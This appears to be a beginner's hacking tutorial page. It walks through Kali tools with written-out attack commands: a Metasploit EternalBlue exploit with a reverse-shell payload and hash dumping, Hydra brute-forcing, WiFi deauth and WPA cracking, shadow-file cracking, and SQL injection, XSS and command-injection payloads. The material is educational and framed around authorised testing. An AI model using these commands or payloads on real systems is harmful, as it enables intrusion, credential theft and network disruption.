🔓 Hacking Crash Course
Fundamental concepts, tools, and techniques for beginners.
⚠️ LEGAL DISCLAIMER
Only hack systems you own or have explicit permission to test.
Unauthorized access to computer systems is illegal. This guide is for educational purposes and ethical security testing only.
🎯 The Hacking Mindset
🔍 Curiosity
Ask "what if?" and "why?"
Understand how things work
🧩 Problem Solving
Break complex problems into smaller pieces
Think systematically
🔄 Persistence
Try different approaches when one fails
Never give up easily
📚 Continuous Learning
Technology changes constantly
Stay updated
🏗️ Core Concepts
1. Types of Hackers
White Hat
Ethical hackers
Security professionals
Have permission
Black Hat
Malicious hackers
Break laws
No permission
Grey Hat
Somewhere in between
May break laws
Often report findings
2. Basic Terminology
Vulnerability
A weakness in a system that can be exploited
Exploit
Code or technique that takes advantage of a vulnerability
Payload
Malicious code delivered by an exploit
Shell
Command-line interface access to a system
Privilege Escalation
Gaining higher access levels (user → admin)
Persistence
Maintaining access after initial compromise
🔧 Essential Kali Linux Tools
Kali Linux - The Hacker's OS
Pre-installed with 600+ security tools. Download from kali.org
nmap
Network scanner - discovers hosts and services
Command Examples:
# Basic scan nmap 192.168.1.1 # Stealth scan (SYN scan) nmap -sS 192.168.1.1 # Aggressive scan with OS detection nmap -A 192.168.1.1 # Scan specific ports nmap -p 80,443,22,21 192.168.1.1 # Scan all ports (slow) nmap -p- 192.168.1.1 # Scan network range nmap 192.168.1.1-254
Metasploit Framework
Exploitation framework - automates vulnerability exploitation
Command Examples:
# Start Metasploit msfconsole # Search for exploits search eternalblue search type:exploit platform:windows # Use an exploit use exploit/windows/smb/ms17_010_eternalblue # Set options set RHOST 192.168.1.10 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 # Run exploit exploit # Meterpreter commands (after successful exploit) sysinfo # System information getuid # Current user shell # Get system shell hashdump # Dump password hashes
Wireshark
Network protocol analyzer - captures and analyzes traffic
Command Examples:
# GUI version (recommended for beginners) wireshark # Command line version tshark -i eth0 # Capture on eth0 tshark -i eth0 -Y "http" # Filter HTTP traffic tshark -i eth0 -Y "dns" # Filter DNS queries tshark -r capture.pcap # Read from file tshark -i eth0 -w capture.pcap # Write to file
John the Ripper
Password cracker - breaks password hashes
Command Examples:
# Basic password cracking john hashes.txt # With wordlist john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # Show cracked passwords john --show hashes.txt # Specific format (MD5, SHA256, etc.) john --format=raw-md5 hashes.txt # Incremental mode (brute force) john --incremental hashes.txt
Hydra
Network login cracker - brute forces login services
Command Examples:
# SSH brute force hydra -l admin -P passwords.txt ssh://192.168.1.1 # FTP brute force hydra -L users.txt -P passwords.txt ftp://192.168.1.1 # HTTP POST form (like login pages) hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid" # RDP (Windows Remote Desktop) hydra -l administrator -P passwords.txt rdp://192.168.1.10
Aircrack-ng
WiFi security auditing tools
Command Examples:
# Put wireless card in monitor mode airmon-ng start wlan0 # Scan for networks airodump-ng wlan0mon # Capture handshake (WPA/WPA2) airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Deauth attack to capture handshake aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Crack WPA handshake aircrack-ng -w rockyou.txt capture-01.cap
🔓 Practical Hacking Examples
1. Network Scanning & Enumeration
Goal: Discover live hosts, open ports, and services
Step 1: Discover Live Hosts
nmap -sn 192.168.1.0/24 # Output shows which IP addresses are active
Step 2: Scan Open Ports
nmap -sV -sC 192.168.1.10 # -sV: Version detection # -sC: Default scripts (safe)
Step 3: Service Enumeration
# If port 80 (HTTP) is open whatweb http://192.168.1.10 nikto -h http://192.168.1.10 dirb http://192.168.1.10 /usr/share/wordlists/dirb/common.txt
2. Password Cracking Example
Scenario: You have a Linux shadow file with password hashes
Step 1: Extract Hashes
unshadow /etc/passwd /etc/shadow > hashes.txt # Creates a file with username:hash format
Step 2: Crack with Wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # RockYou.txt has 14 million real passwords
Step 3: Show Results
john --show hashes.txt # Shows cracked passwords like: # user1:password123:1000:... # user2:letmein:1001:...
3. Web Application Testing
Common Vulnerabilities: SQL Injection, XSS, Command Injection
SQL Injection
Testing for database vulnerabilities
# Basic test in URL parameter http://site.com/page?id=1' http://site.com/page?id=1 OR 1=1-- http://site.com/page?id=1 UNION SELECT 1,2,3-- # Use sqlmap for automation sqlmap -u "http://site.com/page?id=1" --dbs sqlmap -u "http://site.com/page?id=1" -D database --tables sqlmap -u "http://site.com/page?id=1" -D database -T users --dump
XSS (Cross-Site Scripting)
Injecting JavaScript into web pages
# Basic XSS payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Test in search fields, forms, URL parameters
http://site.com/search?q=<script>alert(1)</script>
Command Injection
Executing system commands through web input
# Test for command injection ; ls -la | cat /etc/passwd `whoami` $(id) # If it's a ping utility: 127.0.0.1; cat /etc/passwd 127.0.0.1 | whoami
4. WiFi Security Testing
Note: Only test your own WiFi networks
Step 1: Monitor Mode
airmon-ng start wlan0 # Creates wlan0mon interface in monitor mode
Step 2: Capture Handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Wait for a client to connect, or force with: aireplay-ng -0 4 -a AA:BB:CC:DD:EE:FF wlan0mon
Step 3: Crack WPA Password
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap # If successful, shows: KEY FOUND! [password123]
🛡️ Defense & Protection
How to Protect Yourself
- Strong Passwords: Use password managers, enable 2FA
- Keep Software Updated: Patches fix security vulnerabilities
- Firewall: Block unnecessary incoming connections
- Encryption: Use HTTPS, VPN, full disk encryption
- Backups: Regular backups protect against ransomware
- Awareness: Don't click suspicious links or attachments
Basic Linux Security Commands
Check Listening Ports
netstat -tulpn ss -tulpn # Shows what's listening on your machine
Check Running Processes
ps aux | grep suspicious top htop # Look for unusual processes
Check File Permissions
find / -perm -4000 2>/dev/null # Find SUID files (potential privilege escalation) ls -la /etc/passwd /etc/shadow # Check critical file permissions
📚 Learning Path
Beginner (1-3 months)
Linux basics, networking fundamentals, basic tools (nmap, Wireshark)
Intermediate (3-12 months)
Scripting (Bash, Python), Metasploit, web app testing, CTFs
Advanced (1-2+ years)
Exploit development, reverse engineering, malware analysis, advanced pentesting
Practice Environments
- TryHackMe: Beginner-friendly rooms and paths
- HackTheBox: More challenging machines
- VulnHub: Download vulnerable VMs to practice
- OWASP WebGoat: Deliberately insecure web app
- Metasploitable: Vulnerable Linux VM